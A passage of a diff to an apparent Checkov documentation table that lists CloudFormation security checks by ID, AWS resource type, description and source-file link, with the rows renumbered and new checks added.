-| 145 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
-| 146 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) |
-| 147 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) |
-| 148 | CKV_AWS_173 | 
resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) |
-| 149 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) |
-| 150 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) |
-| 151 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) |
-| 152 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) |
-| 153 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) |
-| 154 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | 
[GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) |
-| 155 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) |
-| 156 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) |
-| 157 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) |
-| 158 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) |
-| 159 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) |
-| 160 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 161 | CKV_AWS_317 | resource | 
AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 162 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) |
-| 163 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) |
-| 164 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) |
-| 165 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) |
-| 166 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) |
-| 167 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | 
[AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) |
+| 70 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) |
+| 71 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) |
+| 72 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) |
+| 73 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) |
+| 74 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) |
+| 75 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) |
+| 76 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | 
[DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) |
+| 77 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) |
+| 78 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) |
+| 79 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) |
+| 80 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. 
| Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) |
+| 81 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) |
+| 82 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) |
+| 83 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) |
+| 84 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) |
+| 85 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) |
+| 86 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) |
+| 87 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | 
[APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | +| 88 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | +| 89 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 90 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | +| 91 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 92 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | +| 93 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | +| 94 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure 
DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | +| 95 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | +| 96 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 97 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 98 | CKV_AWS_107 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 99 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 100 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | +| 101 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 102 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 103 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 104 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 105 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | +| 106 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 107 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 108 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | 
[IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 109 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 110 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | +| 111 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 112 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 113 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 114 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 115 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 116 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 117 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 118 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 119 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 120 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 121 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 122 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for 
function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 123 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | +| 124 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | +| 125 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | +| 126 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | +| 127 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 128 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 129 | CKV_AWS_120 
| resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | +| 130 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | +| 131 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 132 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) | +| 133 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 134 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 135 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 136 | CKV_AWS_155 | resource 
| AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 137 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 138 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) | +| 139 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 140 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 141 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) | +| 142 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 143 | CKV_AWS_163 | resource | 
AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) | +| 144 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) | +| 145 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) | +| 146 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) | +| 147 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 148 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 149 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 150 | CKV_AWS_173 | 
resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | +| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | 